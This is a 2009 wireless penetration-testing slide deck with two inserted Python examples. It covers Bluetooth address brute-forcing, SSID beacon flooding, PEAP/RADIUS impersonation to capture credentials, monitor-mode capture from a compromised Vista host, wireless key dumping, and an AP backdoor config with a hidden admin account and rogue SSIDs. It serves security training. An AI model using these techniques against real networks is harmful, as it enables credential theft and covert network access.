Wireless Weaponry
Tools, Tips and Techniques for Effective Wireless Pen Testing
Joshua Wright
[email protected]
Copyright 2009, All Rights Reserved

Wireless Weaponry - ©2009, Joshua Wright
Your Speaker
• Joshua Wright
• Senior Security Analyst, InGuardians
• Senior SANS Instructor, Ethical Hacking Wireless course author
• [email protected]
• [email protected]
Chef-Style TFH
Introduction
• General false sense of security with regard to wireless
  – "What, WPA doesn't solve all my problems?!?" (Answer: No, it doesn't)
• Not just WiFi; Bluetooth, ZigBee and proprietary protocols
• Wireless Weaponry: Pragmatic tools and techniques for better pen tests
Outline
• Scanning and Reconnaissance
• Exploitation
• Post-Exploitation
• Wireless Use and Exploitation Evolution
• Conclusions and Q&A

Section: Scanning and Reconnaissance
Kismet is a Staple Tool
• Kismet Stable has many features that are often overlooked
  – Multiple simultaneous interfaces
  – CSV and XML data for post-processing analysis
  – Controlling the channel hopping sequence for more effective coverage
• Kismet Newcore introduces performance, UI, and functionality improvements
Kismet for Pen Testers
• One or more high-gain USB cards (ALFA) as primary interface
  – One card for channel hopping
  – Second card for locking the channel hopper for interesting networks
• Atheros PC Card for b/g/a sniffing
  – Most activity is still on b/g
• Change channel sequence to hop to 1,6,11 more frequently (or 1,4,8,11 if deployed)

Hacking the Kismet Stable channel hopper (5 channels == ~1 second):
defaultchannels=IEEE80211g:1,1,1,1,1,7,6,6,6,6,6,4,11,11,11,11,11,8,1,…
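An added example, not from the slides, showing what the weighted hop list above does to channel dwell time: it parses a Kismet Stable defaultchannels value, reports the share of sniffing time per channel and the cycle length, and builds a sequence weighted toward 1, 6 and 11 in the same style. The weighted value and the 5 hops/second rate come from the slide; UNIFORM_G is a constructed comparison sweep, not Kismet's shipped default.

```python
from collections import Counter

# Constructed kismet.conf-style values. WEIGHTED_G follows the slide's weighted
# list (which trails off); UNIFORM_G is a plain 1..11 sweep for comparison.
WEIGHTED_G = "IEEE80211g:1,1,1,1,1,7,6,6,6,6,6,4,11,11,11,11,11,8"
UNIFORM_G = "IEEE80211g:" + ",".join(str(c) for c in range(1, 12))
HOPS_PER_SEC = 5  # the slide: 5 channels == ~1 second in Kismet Stable

def parse_defaultchannels(spec):
    """Split a 'defaultchannels=PHY:ch,ch,...' value into (phy, [channels])."""
    spec = spec.split("=", 1)[1] if spec.startswith("defaultchannels=") else spec
    phy, _, chans = spec.partition(":")
    return phy, [int(c) for c in chans.split(",") if c.strip()]

def dwell_share(channels, hops_per_sec=HOPS_PER_SEC):
    """Fraction of sniffing time spent on each channel, plus seconds per cycle."""
    counts = Counter(channels)
    share = {ch: counts[ch] / len(channels) for ch in sorted(counts)}
    return share, len(channels) / hops_per_sec

def build_sequence(primary=(1, 6, 11), weight=5,
                   others=(2, 3, 4, 5, 7, 8, 9, 10, 12, 13)):
    """Dwell on each primary channel `weight` hops in turn, slipping one of the
    other channels in after each group so the whole band is still swept. Extra
    primary groups are appended so each primary channel gets equal time."""
    seq, pending, i = [], list(others), 0
    while pending or i % len(primary):
        seq.extend([primary[i % len(primary)]] * weight)
        if pending:
            seq.append(pending.pop(0))
        i += 1
    return seq

def format_defaultchannels(phy, channels):
    """Render a hop list back into kismet.conf syntax."""
    return f"defaultchannels={phy}:" + ",".join(map(str, channels))

if __name__ == "__main__":
    for spec in (UNIFORM_G, WEIGHTED_G):
        phy, chans = parse_defaultchannels(spec)
        share, cycle = dwell_share(chans)
        on_main = sum(share.get(c, 0) for c in (1, 6, 11))
        print(f"{spec}\n  {cycle:.1f}s per cycle, {on_main:.0%} of time on 1/6/11")
    print(format_defaultchannels("IEEE80211g", build_sequence()))
```

The trade-off the numbers make visible: the weighted list spends 5/6 of its time on 1/6/11 but takes longer to revisit the other channels, so a card locked to a channel of interest (the slide's second card) is what keeps that coverage honest.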
Kismet Newcore
• Not just 802.11 anymore
  – DECT scanning plugin
  – ZigBee/802.15.4 scanning in progress
• Not just passive anymore
  – Plugins actively manipulate the network (not default, but possible)
• Not just analysis anymore
  – Live PTW WEP cracking, for starters
Cisco Spectrum Expert
~$3000
Bluetooth Enumeration
• Many (all?) Bluetooth devices respond to *:*:AA:BB:CC:DD
• Knowing the last 3 bytes, can test 256 values to find the target
• Optimized using BNAP, BNAP data

# ruby bt-uap-search.rb 4 EC:47:86
Contacting 4A:57:00:EC:47:86 using hci0 (1/256)
Contacting 4A:57:01:EC:47:86 using hci1 (2/256)
Contacting 4A:57:02:EC:47:86 using hci2 (3/256)
Contacting 4A:57:03:EC:47:86 using hci3 (4/256)
Contacting 4A:57:25:EC:47:86 using hci1 (38/256)
Contacting 4A:57:26:EC:47:86 using hci3 (39/256)
TARGET FOUND: 4A:57:25:EC:47:86 (hci1)
Hey, What Happened to Pragmatism?
• Scanning for Bluetooth still takes a long time
  – Not practical or useful to find someone's iPhone (usually)
• Targeted attacks may be worthwhile
  – Credit card processing systems
Bluetooth serial adapter
Section: Exploitation
Pragmatic Exploitation
• Keep an eye out for the little things
• Don't let an ad-hoc network pass you by
  – XP clients, printers common
• Watch guest networks for internal employees (NBNS broadcasts)
  – Often escaping web filtering
  – Target these clients directly as guest
• What networks are clients probing for?
Karmetasploit
• Magic WiFi from the Metasploit project
  – "Hi, I'm the network you asked for, and every other network in the world. Here are a bunch of exploits, kthxbye."
• Becoming more difficult to leverage against Vista and XP SP3
  – Clients wait to hear beacons from their preferred network before probing
• We can beacon too …
Chaka Kahn
Wait, what?
• Injects beacons using common SSIDs
  – Courtesy of the top-SSID list from wigle.net
• Causes clients to think their preferred networks are available, leading to probes

# ./msfconsole -r ssidlist.rc

       =[ msf v3.3-dev
+ -- --=[ 295 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 60 aux

resource> use auxiliary/dos/wireless/ssidlist_beacon
resource> set DRIVER madwifing
DRIVER => madwifing
resource> set INTERFACE wifi0
INTERFACE => wifi0
resource> set CHANNEL 1
CHANNEL => 1
resource> exploit
[*] Sending beacon frames...
Exploiting PEAP
• Attacking RADIUS server TLS validation by client
  – Client typically validates cert, but does not enforce a given CN
  – Client often allowed to accept or reject a new certificate from RADIUS
• FreeRADIUS-WPE: Modified RADIUS server to exploit PEAP, others
RADIUS Impersonation
1. Attacker sniffs network, identifies CA in use
2. Attacker buys wireless cert from same CA for CN "evilhacker.net"
3. Attacker starts FreeRADIUS-WPE with AP using victim SSID
4. Attacker deauths victim (or waits patiently for a roam operation)
5. Victim connects to attacker AP, gets RADIUS cert
6. Cert is trusted, but not previously observed. Victim is prompted to accept
7. Victim accepts, attacker obtains MS-CHAPv2 credentials, disappears.

Figure: RADIUS impersonation. Actors shown: Victim, WPA2+PEAP Access Point, Corporate Network, RADIUS Server, CA ($$); the Spoofed Deauthenticate is step 4, and steps 1 through 6 are marked on the diagram.
Callout: WZC displays name, not CN
Section: Post-Exploitation
Long-Range WiFi Attacks
Client Compromise
• Concept: Leverage client compromise to attack internal wireless networks
• Vista introduces an all-new wireless stack
• NDIS 6 requires wireless drivers to support monitor-mode packet capture
  – Previously limited to Linux or commercial drivers
• Unfortunately, not exposed in any built-in applications
• Tools: vistarfmon, nm2lp (InGuardians), NetMon (Microsoft)
Capturing Vista Wireless Traffic
• With RFMON capture, we can use the Vista host to discover and attack nets
  – It's like having a remote Linux box, sort of
• Packet capture supplied by Microsoft NetMon 3.3
  – Silent command-line install and capture… no reboot
• Attacker can enumerate, analyze and attack wireless networks seen by victim
• No attack tools read NetMon WLAN captures
• Solution: nm2lp from InGuardians!

Figure: Corporate Wireless Client and Corporate Access Point traffic observed by the Compromised Vista Host and relayed over the Internet to the pen tester's tools (Ettercap, Kismet, Aircrack-ng, coWPAtty).
Vista Wireless Power Tools

Victim System:
C:\>vistarfmon
vistarfmon: Enable and disable monitor mode on Vista NDIS 6 interfaces.
Copyright (c) 2008 Joshua Wright
Available interface(s):
  1. Intel(R) Wireless WiFi Link 4965AGN, Mode: ExSta, State: connected
C:\>vistarfmon 1 mon
Operation mode set to Monitor.
C:\>nmcap /Network "Wireless Network Connection" /Capture WiFi /File wlan.cap
Netmon Command Line Capture (nmcap) 3.2.1303.0
Loading Parsers ...
Saving info to: C:\\wlan.cap - using circular buffer of size 20.00 MB.

Pen Tester System:
C:\>nm2lp
nm2lp: Convert NetMon 3.2 capture to libpcap format (version 1.0).
Copyright (c) 2008 Joshua Wright
Usage: nm2lp
C:\>nm2lp wlan.cap wlan.dump
Extracting Stored Wireless Keys
• Dictionary attacks against PSK are mildly interesting
  – Distributed CUDA-acceleration is fun too
• Biggest issue is the distributed storage of keys and lack of frequent rotation
• U3 Autorun fun and WirelessKeyView

C:\>wirelesskeyview /stext wlankeys.txt
C:\>type wlankeys.txt
Network Name (SSID): somethingclever
Key Type           : WPA-PSK
Key (Hex)          : 66616d696c79206d6f766965206e6967687400
Key (Ascii)        : family movie night
Where is that AP/Controller?
Many APs reveal their IP address in management frames, or in data frames carrying management traffic (Cisco Aironet in this example, 172.16.0.92)
Attacking AP Management Interface
• APs themselves are useful targets
  – Management interfaces exposed on guest networks
  – Compromised client access to device
• Weak passwords, weak protocols, RADIUS manipulation, cookie theft
• Once you control the AP, you can have lots of fun on the network
  – Especially when the AP is on a .1q port
Ghost in the AP Attack

Before:
username admin1 privilege 15 secret 5 $1$9Q...
username admin2 privilege 1 secret 5 $1$8oR...
aaa authentication login local enable
interface Dot11Radio0
 encryption vlan 101 ciphers aes-ccm
 !
 ssid KJOCorpNet
    vlan 101
    guest-mode
    authentication network-eap eap_methods
 !
 ssid KJOGuest
    vlan 156
    guest-mode
    authentication open

After (Eeek!):
username admin1 privilege 15 secret 5 $1$9Q...
username admin2 privilege 1 secret 5 $1$8oR...
username acoop privilege 15 secret "evilpass"
aaa authentication login local enable
interface Dot11Radio0
 encryption vlan 101 ciphers aes-ccm
 encryption vlan 1 ciphers aes-ccm
 encryption vlan 102 ciphers aes-ccm
 !
 ssid KJOCorpNet
    vlan 101
    guest-mode
    authentication network-eap eap_methods
 !
 ssid KJOGuest
    vlan 156
    guest-mode
    authentication open
 !
 ! Backdoor network access SSID on mgmt VLAN
 ssid attackerBackdoorWlan
    wpa-psk ascii KevinReallyWearsGlasses
    vlan 1
    no guest-mode
 !
 ! Attacking any other accessible VLAN example
 ssid attackVlan102
    wpa-psk ascii YouWontGuessThisWpaPsk
    vlan 102
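An added example, not from the slides, of the check a defender would run against the Before/After listings above: a small config-drift audit that parses the AP configuration and flags exactly what the attack changed (a new privilege-15 local user, new SSIDs, encryption enabled on VLANs absent from the baseline). The embedded configs are trimmed from the slide's listings; the parser and message strings are this example's own and assume Python 3.8+.

```python
import re

# Baseline and post-compromise AP configs trimmed from the slide's Before/After
# listings ("$1$9Q..." is the slide's own shortened secret). Python 3.8+.
BEFORE = """username admin1 privilege 15 secret 5 $1$9Q...
interface Dot11Radio0
 encryption vlan 101 ciphers aes-ccm
 ssid KJOCorpNet
  vlan 101
  authentication network-eap eap_methods
 ssid KJOGuest
  vlan 156
  authentication open
"""
AFTER = BEFORE.replace(  # the attacker's additions spliced into the baseline
    "interface Dot11Radio0",
    'username acoop privilege 15 secret "evilpass"\ninterface Dot11Radio0\n'
    " encryption vlan 1 ciphers aes-ccm\n encryption vlan 102 ciphers aes-ccm",
) + """ ssid attackerBackdoorWlan
  wpa-psk ascii KevinReallyWearsGlasses
  vlan 1
 ssid attackVlan102
  wpa-psk ascii YouWontGuessThisWpaPsk
  vlan 102
"""

def parse_ap_config(text):
    """Return (users: name->privilege, ssids: name->{vlan, auth}, encrypted VLANs)."""
    users, ssids, enc_vlans, cur = {}, {}, set(), None
    for line in (raw.strip() for raw in text.splitlines()):
        if m := re.match(r"username (\S+) privilege (\d+)", line):
            users[m.group(1)], cur = int(m.group(2)), None
        elif m := re.match(r"encryption vlan (\d+)", line):
            enc_vlans.add(int(m.group(1)))
        elif m := re.match(r"ssid (\S+)", line):
            cur, ssids[m.group(1)] = m.group(1), {"vlan": None, "auth": None}
        elif cur and (m := re.match(r"vlan (\d+)", line)):
            ssids[cur]["vlan"] = int(m.group(1))
        elif cur and line.startswith(("authentication ", "wpa-psk ")):
            ssids[cur]["auth"] = " ".join(line.split()[:2])  # never echo the PSK
    return users, ssids, enc_vlans

def drift_findings(baseline, current):
    """Changes an AP config audit should alert on after the slide's attack."""
    bu, bs, bv = parse_ap_config(baseline)
    cu, cs, cv = parse_ap_config(current)
    out = [f"new or elevated user {u} (privilege {p})" for u, p in cu.items() if bu.get(u, -1) < p]
    out += [f"new SSID {s} on VLAN {c['vlan']} ({c['auth']})" for s, c in cs.items() if s not in bs]
    out += [f"encryption enabled on VLAN {v} not in baseline" for v in sorted(cv - bv)]
    return out
```

Run against the slide's pair, drift_findings(BEFORE, AFTER) reports five findings: the acoop account, the two backdoor SSIDs on VLANs 1 and 102, and the two new encryption VLANs, while the unchanged baseline yields none.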
Section: Wireless Use and Exploitation Evolution
Complacent Wireless Security
• My growing concern over wireless security
  – "Where there is a wireless, there is a way"
• Effective wireless pen testing is not possible in a 2-hour non-obstructive engagement
  – And not a practical reflection of an actual attack
• Customer value-add with educated attack concessions
  – "Let's talk about the resources of your adversary, and the time they could invest into cracking your WPA-PSK key. We can continue the pen-test from there."
Wireless Adoption
• Continued wireless adoption reaching new verticals
  – ZigBee and 802.15.4 growing in popularity for low-power needs (retail, manufacturing)
• Smart Grid wireless technology on every home
  – WiMAX, cellular or proprietary uplink
  – ZigBee in the home area network (HAN)
Wireless penetration testing incorporates multiple protocols, techniques and skill sets
ZigBee Pen Testing
• Current ZigBee lacks robust security
  – "Residential" or "standard security" mode == plaintext key delivery OTA
  – No mutual authentication available
• ZigBee Pro (2007) stack improves security, at the cost of flash, memory, CPU
  – Will not be adopted by all vendors
• Distributed keys on all devices, hardware key extraction remains viable
• New retail profile makes ZigBee a financially viable target for attackers (CC transmissions at stores)
  – But, you have to find the device first
zbfind
"… due to the low-cost nature of ad hoc network devices, one cannot generally assume the availability of tamper resistant hardware. Hence, physical access to a device may yield access to secret keying material and other privileged information, as well as access to the security software and hardware."
Source: ZigBee Specification 053474r17, Jan. 2008
Section: Conclusions and Q&A
Conclusion
• Wireless pen testing has many angles
  – Not just attacker → AP → pwned
• Pragmatic recon, exploit, post-exploit recommendations
• Talk to your customer about the best use of your time (and their money) for an effective test
• Don't get caught up in a single wireless technology
  – WiFi, Bluetooth, WiMAX, ZigBee, proprietary are all areas you should be targeting
• Help change your complacent customer's mind about the risks and threats of wireless
Q+A, Resources
Joshua Wright
Office/Mobile: 401-524-2911
[email protected]
[email protected]
www.inguardians.com
www.willhackforsushi.com

SANS Ethical Hacking Wireless Course - www.sans.org/training/description.php?mid=3
vistarfmon - www.inguardians.com/tools
Kismet Stable - www.kismetwireless.net
nm2lp - www.inguardians.com/tools
Kismet Newcore - www.kismetwireless.net
zbfind - Contact Josh
WiFiFoFum - iPhone Store
Cisco Spectrum Expert - www.cisco.com/en/US/products/ps9393
Chaka Kahn - www.willhackforsushi.com/code/ssidlist_beacon.rb
FreeRADIUS-WPE - www.willhackforsushi.com/?page_id=37
NetMon 3.3 - connect.microsoft.com/site/sitehome.aspx?SiteID=216
wirelesskeyview - www.aspecto-software.com/rw/applications/wififofum